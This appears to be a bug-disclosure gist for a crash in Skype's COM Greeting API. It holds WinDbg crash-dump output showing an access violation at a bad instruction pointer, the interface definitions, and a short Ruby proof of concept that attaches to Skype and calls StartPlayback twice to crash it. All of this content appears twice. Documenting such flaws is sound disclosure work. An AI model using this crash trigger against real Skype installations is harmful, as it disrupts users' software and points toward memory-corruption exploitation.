abhisek/Skype Greeting API Crash Log

## Skype Greeting API Crash Log
0:011> u @eip
<Unloaded_i.dll>+0x1e:
0000001f ??              ???
            ^ Memory access error in 'u @eip'
0:011> dd @esp
03e2fde0  0095cadd 010dd544 00000000 001e3206
03e2fdf0  05566a80 001f3e98 001f0ba0 000003a7
03e2fe00  05566a95 0063028b 05566a80 00000000
03e2fe10  001523aa 0542dbd8 03e2fe78 0015238d
03e2fe20  00000000 0557ec70 001e3206 0512c888
03e2fe30  0557ec70 0557ec70 0512c888 0512c888
03e2fe40  00000000 00000000 001f3e98 00630000
03e2fe50  00000000 00000000 00000000 00871ba0
0:011> ub 0095cadd
Skype+0x55cabc:
0095cabc e8dfe6e4ff      call    Skype+0x3ab1a0 (007ab1a0)
0095cac1 80bf8100000000  cmp     byte ptr <Unloaded_i.dll>+0x80 (00000081)[edi],0
0095cac8 7507            jne     Skype+0x55cad1 (0095cad1)
0095caca 8bf7            mov     esi,edi
0095cacc e83ffae4ff      call    Skype+0x3ac510 (007ac510)
0095cad1 6844d50d01      push    offset Skype+0xcdd544 (010dd544)
0095cad6 8bcd            mov     ecx,ebp
0095cad8 e873faffff      call    Skype+0x55c550 (0095c550)


Auto Analysis:
==============

FAULTING_IP:
i+1e
0000001f ??              ???

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0000001f (<Unloaded_i.dll>+0x0000001e)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 0000001f
Attempt to read from address 0000001f

FAULTING_THREAD:  00000e20

DEFAULT_BUCKET_ID:  BAD_INSTRUCTION_PTR

PROCESS_NAME:  Skype.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  0000001f

READ_ADDRESS:  0000001f

FOLLOWUP_IP:
i+1e
0000001f ??              ???

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

PRIMARY_PROBLEM_CLASS:  BAD_INSTRUCTION_PTR

## Skype Greeting Interface
ISkype::Greeting
=================

[id(0x00000030), propget, helpstring("Returns user greeting."), helpcontext(0x0000000d)]
HRESULT Greeting(
                [in, optional, defaultvalue("")] BSTR Username,
                [out, retval] IVoicemail** pVal);


ISkype::IVoicemail
===================

[id(0x0000000b), helpstring("Starts voicemail playback."), helpcontext(0x00000033)]
HRESULT StartPlayback();


[id(0x0000000c), helpstring("Stops voicemail playback."), helpcontext(0x00000033)]
HRESULT StopPlayback();

## skype_greeting_api_poc.rb
require 'win32ole'

skype = WIN32OLE.new("SKYPE4COM.SKYPE")
skype.attach

skype.Greeting.send('StartPlayback')
skype.Greeting.send('StartPlayback')

skype.Greeting.send('StopPlayback')
	0:011> u @eip
	<Unloaded_i.dll>+0x1e:
	0000001f ?? ???
	^ Memory access error in 'u @eip'
	0:011> dd @esp
	03e2fde0 0095cadd 010dd544 00000000 001e3206
	03e2fdf0 05566a80 001f3e98 001f0ba0 000003a7
	03e2fe00 05566a95 0063028b 05566a80 00000000
	03e2fe10 001523aa 0542dbd8 03e2fe78 0015238d
	03e2fe20 00000000 0557ec70 001e3206 0512c888
	03e2fe30 0557ec70 0557ec70 0512c888 0512c888
	03e2fe40 00000000 00000000 001f3e98 00630000
	03e2fe50 00000000 00000000 00000000 00871ba0
	0:011> ub 0095cadd
	Skype+0x55cabc:
	0095cabc e8dfe6e4ff call Skype+0x3ab1a0 (007ab1a0)
	0095cac1 80bf8100000000 cmp byte ptr <Unloaded_i.dll>+0x80 (00000081)[edi],0
	0095cac8 7507 jne Skype+0x55cad1 (0095cad1)
	0095caca 8bf7 mov esi,edi
	0095cacc e83ffae4ff call Skype+0x3ac510 (007ac510)
	0095cad1 6844d50d01 push offset Skype+0xcdd544 (010dd544)
	0095cad6 8bcd mov ecx,ebp
	0095cad8 e873faffff call Skype+0x55c550 (0095c550)



	Auto Analysis:
	==============

	FAULTING_IP:
	i+1e
	0000001f ?? ???

	EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
	ExceptionAddress: 0000001f (<Unloaded_i.dll>+0x0000001e)
	ExceptionCode: c0000005 (Access violation)
	ExceptionFlags: 00000000
	NumberParameters: 2
	Parameter[0]: 00000000
	Parameter[1]: 0000001f
	Attempt to read from address 0000001f

	FAULTING_THREAD: 00000e20

	DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR

	PROCESS_NAME: Skype.exe

	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

	EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

	EXCEPTION_PARAMETER1: 00000000

	EXCEPTION_PARAMETER2: 0000001f

	READ_ADDRESS: 0000001f

	FOLLOWUP_IP:
	i+1e
	0000001f ?? ???

	NTGLOBALFLAG: 0

	APPLICATION_VERIFIER_FLAGS: 0

	PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR
	ISkype::Greeting
	=================

	[id(0x00000030), propget, helpstring("Returns user greeting."), helpcontext(0x0000000d)]
	HRESULT Greeting(
	[in, optional, defaultvalue("")] BSTR Username,
	[out, retval] IVoicemail** pVal);


	ISkype::IVoicemail
	===================

	[id(0x0000000b), helpstring("Starts voicemail playback."), helpcontext(0x00000033)]
	HRESULT StartPlayback();


	[id(0x0000000c), helpstring("Stops voicemail playback."), helpcontext(0x00000033)]
	HRESULT StopPlayback();
	require 'win32ole'

	skype = WIN32OLE.new("SKYPE4COM.SKYPE")
	skype.attach

	skype.Greeting.send('StartPlayback')
	skype.Greeting.send('StartPlayback')

	skype.Greeting.send('StopPlayback')